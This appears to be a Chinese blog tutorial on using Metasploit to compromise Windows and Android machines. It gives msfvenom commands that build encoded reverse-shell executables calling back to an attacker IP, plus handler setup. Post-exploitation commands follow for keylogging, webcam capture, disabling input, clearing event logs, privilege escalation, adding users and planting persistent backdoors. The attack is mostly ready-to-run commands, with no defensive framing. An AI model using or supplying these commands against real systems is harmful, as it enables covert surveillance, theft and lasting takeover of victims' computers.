1.1Matesploit的msfconsole模式的简单使用
2019-06-28 本文已影响0人
长江悠悠向东流
目的:使用matesploit模块获得win7权限
系统:Kali,攻击机:Kali,被攻击电脑:Win7/Win10
1,生成远控文件
Win系列:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f exe -o /root/Desktop/virus.exe -e x86/shikata_ga_nai -i 8
lhost:攻击者ip
lport:攻击者port
Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 R > /root/a.apk
2,Kali执行msfconsole开始监听程序(Root模式下)
msfconsole
image.png
使用handler模块
use exploit/multi/handler
image.png
设置攻击负载
set payload windows/meterpreter/reverse_tcp
image.png
设置本地监听ip和端口
set LHOST 127.0.0.1
set LPORT 4444
image.png
最后,将生成的.exe/.apk文件在windows/android上运行
在Kali上运行 run/exploit
image.png
成功得到权限
输入shell,进入windows cmd模式
image.png
其他常用命令:
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
网络摄像头摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
执行执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
迁移进程迁移
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
kill <pid值> #杀死进程
清除日志
clearav #清除windows中的应用程序日志、系统日志、安全日志
getsystem提权
getsystem
远程桌面及截屏
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接
getgui命令
run getgui –h #查看帮助
run getgui -e #开启远程桌面
run getgui -u lltest2 -p 123456 #添加用户
run getgui -f 6661 –e #3389端口转发到6661
键盘记录
keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录
后门植入
Metasploit的自带的后门有两种方式启动的,一种是通过启动项启动(持久性),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。
1)持久性启动项后门
在C:\用户*** \应用程序数据\本地的\ Temp \目录下,上传一个VBS脚本
在注册表A. HKLM \软件\微软\的Windows \ CurrentVersion \运行\加入开机启动项
run persistence –h #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
image
image
连接后门
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit
image
2)metsvc服务后门
在C:\用户*** \应用程序数据\本地\ TEMP \上传了三个文件(metsrv.x86.dll,metsvc-SERVER.EXE,metsvc.exe),通过服务启动,服务名为Meterpreter就会
run metsvc –h # 查看帮助
run metsvc –A #自动安装后门
image
image
连接后门
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit
image
然后,开始你的冒险之旅吧!